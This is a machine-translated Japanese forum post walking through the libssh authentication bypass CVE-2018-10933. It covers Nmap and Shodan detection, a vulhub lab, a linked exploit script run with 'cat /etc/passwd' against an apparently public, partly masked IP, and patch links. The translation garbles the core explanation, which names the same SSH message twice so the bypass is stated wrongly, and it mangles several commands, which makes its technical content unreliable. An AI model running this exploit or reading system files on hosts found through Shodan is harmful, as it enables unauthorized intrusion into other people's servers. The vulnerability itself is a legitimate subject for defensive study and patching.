Jump to content

0x00脆弱性の説明

libssh 0.6以降のバージョンよりも、サーバーコードの実装には脆弱性をバイパスします。サーバーへの認証の過程で、攻撃者はSSH2_MSG_USERAUTH_SUCCESSメッセージをSSH2_MSG_USERAUTH_SUCCESSに置き換えることにより、有効な資格情報なしでSSH2_MSG_USERAUTH_REQUESTメッセージに認証できます。

0x01脆弱性はバージョンに影響します

libssh 0.8.x -0.8.3

libssh 0.7.x -0.7.5

libssh 0.6.x

0x02脆弱性検出

1.NMAPスキャンLIBSSHバージョン

NMAP -P 2222 -N -PN -T5 -SC -SV 149。*。*。85

5os1xylots08679.jpg

2.shodan.io libssh

3skuc3v0dlf8680.jpg

0x03脆弱性の再発

1。Windowsでスクリプトを実行するのが最善です。 Linuxでスクリプトを実行すると、多くの落とし穴があります(多くの依存関係スクリプトのインストールに問題があります)。 WindowsにPython3をインストールし、次のコマンドを使用してスクリプトをインストールして、依存関係パッケージを実行します。

PIP3 Installl Paramiko

2。脆弱なターゲットマシンの展開、ここでvulhubは展開に使用されます。 (このマシンはubuntu16.04を使用しています)

root@libssh:〜#git clone 3https://github.com/vulhub/vulhub.git

root@libssh:〜#cd vulhub/

root@libssh:〜/vulhub#CD libssh/cve-2018-10933/

root@libssh:〜/vulhub/libssh/cve-2018-10933#docker-composeビルド

root@libssh:〜/vulhub/libssh/cve-2018-10933#docker-compose up -d

ks5n3kgun3t8681.jpg

3.ローカル環境で攻撃スクリプトを実行します

スクリプトのダウンロードアドレス:

https://raw.githubusercontent.com/backlion/cve-2018-10933/master/libssh-cve-2018-10933.py

d: \ python3python.exe libssh-cve-2018-10933.py149。*。*。852222 'cat /etc /passwd'

(ここの2222ポートは、DockerがLibsshの脆弱性を持っているSSHDサービス(ポート22)であり、物理ホストのポート2222をマッピングしていることに注意してください)

qajmqlcpwdw8682.jpg

0x04解決策

公式バージョンは、影響を与えることなくリリースされています。影響を受けるユーザーができるだけ早くアップグレードすることをお勧めします。固定バージョンlibssh 0.8.4および0.7.6のダウンロードリンクは次のとおりです。https://www.libssh.org/files

パッチアドレス:

https://www.libssh.org/security/patches/stable-0.6_cve-2018-10933.jmcd.patch01.txt

アドレス:を更新します

https://www.libssh.org/files/0.7/libssh-0.7.6.tar.xz

https://www.libssh.org/files/0.8/libssh-0.8.4.tar.xz

注:OpenSSHを使用したSSHサービスは影響を受けません

0 Comments

Recommended Comments

There are no comments to display.

Guest
Add a comment...